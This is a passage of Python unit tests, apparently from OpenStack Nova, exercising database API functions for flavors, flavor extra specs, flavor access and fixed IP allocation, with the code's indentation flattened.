self.user_ctxt.project_id)
flavor_by_id = db.flavor_get(self.user_ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
def test_flavor_get_by_name(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
flavor_by_name = db.flavor_get_by_name(self.ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
def test_flavor_get_by_name_not_found(self):
self._create_flavor({})
self.assertRaises(exception.FlavorNotFoundByName,
db.flavor_get_by_name, self.ctxt, 'nonexists')
def test_flavor_get_by_name_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_name = db.flavor_get_by_name(self.ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
# Regular user can not
self.assertRaises(exception.FlavorNotFoundByName,
db.flavor_get_by_name, self.user_ctxt,
flavor['name'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
self.user_ctxt.project_id)
flavor_by_name = db.flavor_get_by_name(self.user_ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
def test_flavor_get_by_flavor_id(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
params = (self.ctxt, flavor['flavorid'])
flavor_by_flavorid = db.flavor_get_by_flavor_id(*params)
self._assertEqualObjects(flavor, flavor_by_flavorid)
def test_flavor_get_by_flavor_not_found(self):
self._create_flavor({})
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id,
self.ctxt, 'nonexists')
def test_flavor_get_by_flavor_id_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'])
self._assertEqualObjects(flavor, flavor_by_fid)
# Regular user can not
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id, self.user_ctxt,
flavor['flavorid'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
self.user_ctxt.project_id)
flavor_by_fid = db.flavor_get_by_flavor_id(self.user_ctxt,
flavor['flavorid'])
self._assertEqualObjects(flavor, flavor_by_fid)
def test_flavor_get_by_flavor_id_deleted(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123'})
db.flavor_destroy(self.ctxt, 'abc')
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'], read_deleted='yes')
self.assertEqual(flavor['id'], flavor_by_fid['id'])
    def test_flavor_get_by_flavor_id_deleted_and_recreate(self):
        # NOTE(wingwj): Aims to test the difference between MySQL and
        # PostgreSQL for bug 1288636
param_dict = {'name': 'abc', 'flavorid': '123'}
self._create_flavor(param_dict)
db.flavor_destroy(self.ctxt, 'abc')
# Recreate the flavor with the same params
flavor = self._create_flavor(param_dict)
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'], read_deleted='yes')
self.assertEqual(flavor['id'], flavor_by_fid['id'])
class InstanceTypeExtraSpecsTestCase(BaseInstanceTypeTestCase):
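    """Tests for the flavor_extra_specs_* methods of the DB API."""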
def setUp(self):
super(InstanceTypeExtraSpecsTestCase, self).setUp()
values = ({'name': 'n1', 'flavorid': 'f1',
'extra_specs': dict(a='a', b='b', c='c')},
{'name': 'n2', 'flavorid': 'f2',
'extra_specs': dict(d='d', e='e', f='f')})
# NOTE(boris-42): We have already tested flavor_create method
# with extra_specs in InstanceTypeTestCase.
self.flavors = [self._create_flavor(v) for v in values]
def test_flavor_extra_specs_get(self):
for it in self.flavors:
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(it['extra_specs'], real_specs)
def test_flavor_extra_specs_delete(self):
for it in self.flavors:
specs = it['extra_specs']
key = list(specs.keys())[0]
del specs[key]
db.flavor_extra_specs_delete(self.ctxt, it['flavorid'], key)
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(it['extra_specs'], real_specs)
def test_flavor_extra_specs_delete_failed(self):
for it in self.flavors:
self.assertRaises(exception.FlavorExtraSpecsNotFound,
db.flavor_extra_specs_delete,
self.ctxt, it['flavorid'], 'dummy')
def test_flavor_extra_specs_update_or_create(self):
for it in self.flavors:
current_specs = it['extra_specs']
current_specs.update(dict(b='b1', c='c1', d='d1', e='e1'))
params = (self.ctxt, it['flavorid'], current_specs)
db.flavor_extra_specs_update_or_create(*params)
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(current_specs, real_specs)
def test_flavor_extra_specs_update_or_create_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_extra_specs_update_or_create,
self.ctxt, 'nonexists', {})
def test_flavor_extra_specs_update_or_create_retry(self):
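        # Stub out _flavor_get_id_from_flavor to always raise
        # DBDuplicateEntry so flavor_extra_specs_update_or_create keeps
        # retrying; with a retry budget of 5 it should fail with
        # FlavorExtraSpecUpdateCreateFailed after exactly 5 attempts.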
def counted():
def get_id(context, flavorid, session):
get_id.counter += 1
raise db_exc.DBDuplicateEntry
get_id.counter = 0
return get_id
get_id = counted()
self.stubs.Set(sqlalchemy_api, '_flavor_get_id_from_flavor', get_id)
self.assertRaises(exception.FlavorExtraSpecUpdateCreateFailed,
sqlalchemy_api.flavor_extra_specs_update_or_create,
self.ctxt, 1, {}, 5)
self.assertEqual(get_id.counter, 5)
class InstanceTypeAccessTestCase(BaseInstanceTypeTestCase):
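    """Tests for the flavor_access_* methods of the DB API."""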
def _create_flavor_access(self, flavor_id, project_id):
return db.flavor_access_add(self.ctxt, flavor_id, project_id)
def test_flavor_access_get_by_flavor_id(self):
flavors = ({'name': 'n1', 'flavorid': 'f1'},
{'name': 'n2', 'flavorid': 'f2'})
it1, it2 = tuple((self._create_flavor(v) for v in flavors))
access_it1 = [self._create_flavor_access(it1['flavorid'], 'pr1'),
self._create_flavor_access(it1['flavorid'], 'pr2')]
access_it2 = [self._create_flavor_access(it2['flavorid'], 'pr1')]
for it, access_it in zip((it1, it2), (access_it1, access_it2)):
params = (self.ctxt, it['flavorid'])
real_access_it = db.flavor_access_get_by_flavor_id(*params)
self._assertEqualListsOfObjects(access_it, real_access_it)
def test_flavor_access_get_by_flavor_id_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id,
self.ctxt, 'nonexists')
def test_flavor_access_add(self):
flavor = self._create_flavor({'flavorid': 'f1'})
project_id = 'p1'
access = self._create_flavor_access(flavor['flavorid'], project_id)
# NOTE(boris-42): Check that flavor_access_add doesn't fail and
# returns correct value. This is enough because other
# logic is checked by other methods.
self.assertIsNotNone(access['id'])
self.assertEqual(access['instance_type_id'], flavor['id'])
self.assertEqual(access['project_id'], project_id)
def test_flavor_access_add_to_non_existing_flavor(self):
self.assertRaises(exception.FlavorNotFound,
self._create_flavor_access,
'nonexists', 'does_not_matter')
def test_flavor_access_add_duplicate_project_id_flavor(self):
flavor = self._create_flavor({'flavorid': 'f1'})
params = (flavor['flavorid'], 'p1')
self._create_flavor_access(*params)
self.assertRaises(exception.FlavorAccessExists,
self._create_flavor_access, *params)
def test_flavor_access_remove(self):
flavors = ({'name': 'n1', 'flavorid': 'f1'},
{'name': 'n2', 'flavorid': 'f2'})
it1, it2 = tuple((self._create_flavor(v) for v in flavors))
access_it1 = [self._create_flavor_access(it1['flavorid'], 'pr1'),
self._create_flavor_access(it1['flavorid'], 'pr2')]
access_it2 = [self._create_flavor_access(it2['flavorid'], 'pr1')]
db.flavor_access_remove(self.ctxt, it1['flavorid'],
access_it1[1]['project_id'])
for it, access_it in zip((it1, it2), (access_it1[:1], access_it2)):
params = (self.ctxt, it['flavorid'])
real_access_it = db.flavor_access_get_by_flavor_id(*params)
self._assertEqualListsOfObjects(access_it, real_access_it)
def test_flavor_access_remove_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_access_remove,
self.ctxt, 'nonexists', 'does_not_matter')
def test_flavor_access_remove_access_not_found(self):
flavor = self._create_flavor({'flavorid': 'f1'})
params = (flavor['flavorid'], 'p1')
self._create_flavor_access(*params)
self.assertRaises(exception.FlavorAccessNotFound,
db.flavor_access_remove,
self.ctxt, flavor['flavorid'], 'p2')
def test_flavor_access_removed_after_flavor_destroy(self):
flavor1 = self._create_flavor({'flavorid': 'f1', 'name': 'n1'})
flavor2 = self._create_flavor({'flavorid': 'f2', 'name': 'n2'})
values = [
(flavor1['flavorid'], 'p1'),
(flavor1['flavorid'], 'p2'),
(flavor2['flavorid'], 'p3')
]
for v in values:
self._create_flavor_access(*v)
db.flavor_destroy(self.ctxt, flavor1['name'])
p = (self.ctxt, flavor1['flavorid'])
self.assertEqual(0, len(db.flavor_access_get_by_flavor_id(*p)))
p = (self.ctxt, flavor2['flavorid'])
self.assertEqual(1, len(db.flavor_access_get_by_flavor_id(*p)))
db.flavor_destroy(self.ctxt, flavor2['name'])
self.assertEqual(0, len(db.flavor_access_get_by_flavor_id(*p)))
class FixedIPTestCase(BaseInstanceTypeTestCase):
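    """Tests for the fixed_ip_* methods of the DB API."""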
def _timeout_test(self, ctxt, timeout, multi_host):
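        """Create an instance plus four fixed IPs, only one of which should
        be picked up by fixed_ip_disassociate_all_by_timeout.
        """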
instance = db.instance_create(ctxt, dict(host='foo'))
net = db.network_create_safe(ctxt, dict(multi_host=multi_host,
host='bar'))
old = timeout - datetime.timedelta(seconds=5)
new = timeout + datetime.timedelta(seconds=5)
# should deallocate
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=net['id'],
updated_at=old))
# still allocated
db.fixed_ip_create(ctxt, dict(allocated=True,
instance_uuid=instance['uuid'],
network_id=net['id'],
updated_at=old))
# wrong network
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=None,
updated_at=old))
# too new
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=None,
updated_at=new))
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def test_fixed_ip_disassociate_all_by_timeout_single_host(self):
now = timeutils.utcnow()
self._timeout_test(self.ctxt, now, False)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'foo', now)
self.assertEqual(result, 0)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'bar', now)
self.assertEqual(result, 1)
def test_fixed_ip_disassociate_all_by_timeout_multi_host(self):
now = timeutils.utcnow()
self._timeout_test(self.ctxt, now, True)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'foo', now)
self.assertEqual(result, 1)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'bar', now)
self.assertEqual(result, 0)
def test_fixed_ip_get_by_floating_address(self):
fixed_ip = db.fixed_ip_create(self.ctxt, {'address': '192.168.0.2'})
values = {'address': '8.7.6.5',
'fixed_ip_id': fixed_ip['id']}
floating = db.floating_ip_create(self.ctxt, values)['address']
fixed_ip_ref = db.fixed_ip_get_by_floating_address(self.ctxt, floating)
self._assertEqualObjects(fixed_ip, fixed_ip_ref)
def test_fixed_ip_get_by_host(self):
host_ips = {
'host1': ['1.1.1.1', '1.1.1.2', '1.1.1.3'],
'host2': ['1.1.1.4', '1.1.1.5'],
'host3': ['1.1.1.6']
}
for host, ips in host_ips.items():
for ip in ips:
instance_uuid = self._create_instance(host=host)
db.fixed_ip_create(self.ctxt, {'address': ip})
db.fixed_ip_associate(self.ctxt, ip, instance_uuid)
for host, ips in host_ips.items():
ips_on_host = [x['address']
for x in db.fixed_ip_get_by_host(self.ctxt, host)]
self._assertEqualListsOfPrimitivesAsSets(ips_on_host, ips)
def test_fixed_ip_get_by_network_host_not_found_exception(self):
self.assertRaises(
exception.FixedIpNotFoundForNetworkHost,
db.fixed_ip_get_by_network_host,
self.ctxt, 1, 'ignore')
def test_fixed_ip_get_by_network_host_fixed_ip_found(self):
db.fixed_ip_create(self.ctxt, dict(network_id=1, host='host'))
fip = db.fixed_ip_get_by_network_host(self.ctxt, 1, 'host')
self.assertEqual(1, fip['network_id'])
self.assertEqual('host', fip['host'])
def _create_instance(self, **kwargs):
instance = db.instance_create(self.ctxt, kwargs)
return instance['uuid']
def test_fixed_ip_get_by_instance_fixed_ip_found(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets([FIXED_IP_ADDRESS],
[ips_list[0].address])
def test_fixed_ip_get_by_instance_multiple_fixed_ips_found(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_2))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ip_get_by_instance_inappropriate_ignored(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_2))
another_instance = db.instance_create(self.ctxt, {})
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=another_instance['uuid'], address="192.168.1.7"))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ip_get_by_instance_not_found_exception(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.FixedIpNotFoundForInstance,
db.fixed_ip_get_by_instance,
self.ctxt, instance_uuid)
def test_fixed_ips_by_virtual_interface_fixed_ip_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets([FIXED_IP_ADDRESS],
[ips_list[0].address])
def test_fixed_ips_by_virtual_interface_multiple_fixed_ips_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_2))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ips_by_virtual_interface_inappropriate_ignored(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_2))
another_vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=another_vif.id, address="192.168.1.7"))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ips_by_virtual_interface_no_ip_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self.assertEqual(0, len(ips_list))
def create_fixed_ip(self, **params):
default_params = {'address': '192.168.0.1'}
default_params.update(params)
return db.fixed_ip_create(self.ctxt, default_params)['address']
def test_fixed_ip_associate_fails_if_ip_not_in_network(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.FixedIpNotFoundForNetwork,
db.fixed_ip_associate,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_fails_if_ip_in_use(self):
instance_uuid = self._create_instance()
address = self.create_fixed_ip(instance_uuid=instance_uuid)
self.assertRaises(exception.FixedIpAlreadyInUse,
db.fixed_ip_associate,
self.ctxt, address, instance_uuid)
def test_fixed_ip_associate_succeeds(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
def test_fixed_ip_associate_succeeds_and_sets_network(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip()
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
self.assertEqual(fixed_ip['network_id'], network['id'])
def test_fixed_ip_associate_succeeds_retry_on_deadlock(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip()
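        # The first query raises DBDeadlock to force a retry; the second
        # returns a usable row, so the association succeeds on the second
        # attempt (hence the expected call count of 2 below).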
def fake_first():
if mock_first.call_count == 1:
raise db_exc.DBDeadlock()
else:
return objects.Instance(id=1, address=address, reserved=False,
instance_uuid=None, network_id=None)
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
self.assertEqual(2, mock_first.call_count)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
self.assertEqual(fixed_ip['network_id'], network['id'])
def test_fixed_ip_associate_succeeds_retry_on_no_rows_updated(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip()
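        # The first query returns a row with a mismatched id, so the
        # follow-up UPDATE affects zero rows and fixed_ip_associate retries;
        # the second query returns the right id and the association succeeds.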
def fake_first():
if mock_first.call_count == 1:
return objects.Instance(id=2, address=address, reserved=False,
instance_uuid=None, network_id=None)
else:
return objects.Instance(id=1, address=address, reserved=False,
instance_uuid=None, network_id=None)
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
self.assertEqual(2, mock_first.call_count)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
self.assertEqual(fixed_ip['network_id'], network['id'])
def test_fixed_ip_associate_succeeds_retry_limit_exceeded(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip()
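        # Every query returns a row with a mismatched id, so the UPDATE never
        # affects any rows and the retry budget is exhausted, resulting in
        # FixedIpAssociateFailed.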
def fake_first():
return objects.Instance(id=2, address=address, reserved=False,
instance_uuid=None, network_id=None)
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
self.assertRaises(exception.FixedIpAssociateFailed,
db.fixed_ip_associate, self.ctxt, address,
instance_uuid, network_id=network['id'])
            # 5 retries + initial attempt
self.assertEqual(6, mock_first.call_count)
def test_fixed_ip_associate_ip_not_in_network_with_no_retries(self):
instance_uuid = self._create_instance()
with mock.patch('sqlalchemy.orm.query.Query.first',
return_value=None) as mock_first:
self.assertRaises(exception.FixedIpNotFoundForNetwork,
db.fixed_ip_associate,
self.ctxt, None, instance_uuid)
self.assertEqual(1, mock_first.call_count)
def test_fixed_ip_associate_no_network_id_with_no_retries(self):
# Tests that trying to associate an instance to a fixed IP on a network
# but without specifying the network ID during associate will fail.
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
with mock.patch('sqlalchemy.orm.query.Query.first',
return_value=None) as mock_first:
self.assertRaises(exception.FixedIpNotFoundForNetwork,
db.fixed_ip_associate,
self.ctxt, address, instance_uuid)
self.assertEqual(1, mock_first.call_count)
def test_fixed_ip_associate_pool_invalid_uuid(self):
instance_uuid = '123'
self.assertRaises(exception.InvalidUUID, db.fixed_ip_associate_pool,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_pool_no_more_fixed_ips(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.NoMoreFixedIps, db.fixed_ip_associate_pool,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_pool_succeeds(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
db.fixed_ip_associate_pool(self.ctxt, network['id'], instance_uuid)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
def test_fixed_ip_associate_pool_succeeds_fip_ref_network_id_is_none(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
self.create_fixed_ip(network_id=None)
fixed_ip = db.fixed_ip_associate_pool(self.ctxt,
network['id'], instance_uuid)
self.assertEqual(instance_uuid, fixed_ip['instance_uuid'])
self.assertEqual(network['id'], fixed_ip['network_id'])
def test_fixed_ip_associate_pool_succeeds_retry(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
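        # The first query returns a row with a bogus address, so the UPDATE
        # matches nothing and fixed_ip_associate_pool retries; the second
        # query returns the real address and the allocation succeeds.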
def fake_first():
if mock_first.call_count == 1:
return {'network_id': network['id'], 'address': 'invalid',
'instance_uuid': None, 'host': None, 'id': 1}
else:
return {'network_id': network['id'], 'address': address,
'instance_uuid': None, 'host': None, 'id': 1}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
db.fixed_ip_associate_pool(self.ctxt, network['id'], instance_uuid)
self.assertEqual(2, mock_first.call_count)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(instance_uuid, fixed_ip['instance_uuid'])
def test_fixed_ip_associate_pool_retry_limit_exceeded(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
self.create_fixed_ip(network_id=network['id'])
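        # Every query returns a row with a bogus address, so the allocation
        # never succeeds and FixedIpAssociateFailed is raised once the retry
        # budget is exhausted.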
def fake_first():
return {'network_id': network['id'], 'address': 'invalid',
'instance_uuid': None, 'host': None, 'id': 1}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
self.assertRaises(exception.FixedIpAssociateFailed,
db.fixed_ip_associate_pool, self.ctxt,
network['id'], instance_uuid)
# 5 retries + initial attempt
self.assertEqual(6, mock_first.call_count)
def test_fixed_ip_create_same_address(self):
address = '192.168.1.5'
params = {'address': address}
db.fixed_ip_create(self.ctxt, params)
self.assertRaises(exception.FixedIpExists, db.fixed_ip_create,
self.ctxt, params)
def test_fixed_ip_create_success(self):
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': '192.168.1.5',
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
fixed_ip_data = db.fixed_ip_create(self.ctxt, param)
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
def test_fixed_ip_bulk_create_same_address(self):
address_1 = '192.168.1.5'
address_2 = '192.168.1.6'
instance_uuid = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
params = [
{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_2, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_1, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
{'reserved': False, 'deleted': 0, 'leased': False,
'host': 'localhost', 'address': address_2, 'allocated': True,
'instance_uuid': instance_uuid, 'network_id': network_id_2,
'virtual_interface_id': None},
]
self.assertRaises(exception.FixedIpExists, db.fixed_ip_bulk_create,
self.ctxt, params)
# In this case the transaction will be rolled back and none of the ips
# will make it to the database.
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address_1)
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address_2)
def test_fixed_ip_bulk_create_success(self):
address_1 = '192.168.1.5'
address_2 = '192.168.1.6'
instance_uuid = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
params = [
{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_1, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
{'reserved': False, 'deleted': 0, 'leased': False,
'host': 'localhost', 'address': address_2, 'allocated': True,
'instance_uuid': instance_uuid, 'network_id': network_id_2,
'virtual_interface_id': None}
]
db.fixed_ip_bulk_create(self.ctxt, params)
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at',
'virtual_interface', 'network', 'floating_ips']
fixed_ip_data = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
        # We have no `id` in the incoming data, so we cannot use
        # _assertEqualListsOfObjects to compare the incoming data with the
        # received objects.
fixed_ip_data = sorted(fixed_ip_data, key=lambda i: i['network_id'])
params = sorted(params, key=lambda i: i['network_id'])
for param, ip in zip(params, fixed_ip_data):
self._assertEqualObjects(param, ip, ignored_keys)
def test_fixed_ip_disassociate(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
values = {'address': '192.168.1.5', 'instance_uuid': instance_uuid}
vif = db.virtual_interface_create(self.ctxt, values)
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': vif['id']
}
db.fixed_ip_create(self.ctxt, param)
db.fixed_ip_disassociate(self.ctxt, address)
fixed_ip_data = db.fixed_ip_get_by_address(self.ctxt, address)
ignored_keys = ['created_at', 'id', 'deleted_at',
'updated_at', 'instance_uuid',
'virtual_interface_id']
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
self.assertIsNone(fixed_ip_data['instance_uuid'])
self.assertIsNone(fixed_ip_data['virtual_interface_id'])
def test_fixed_ip_get_not_found_exception(self):
self.assertRaises(exception.FixedIpNotFound,
db.fixed_ip_get, self.ctxt, 0)
def test_fixed_ip_get_success2(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
fixed_ip_id = db.fixed_ip_create(self.ctxt, param)
self.ctxt.is_admin = False
self.assertRaises(exception.Forbidden, db.fixed_ip_get,
self.ctxt, fixed_ip_id)
def test_fixed_ip_get_success(self):
address = '192.168.1.5'
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': address,
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
db.fixed_ip_create(self.ctxt, param)
fixed_ip_id = db.fixed_ip_get_by_address(self.ctxt, address)['id']
fixed_ip_data = db.fixed_ip_get(self.ctxt, fixed_ip_id)
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
def test_fixed_ip_get_by_address(self):
instance_uuid = self._create_instance()
db.fixed_ip_create(self.ctxt, {'address': '1.2.3.4',
'instance_uuid': instance_uuid,
})
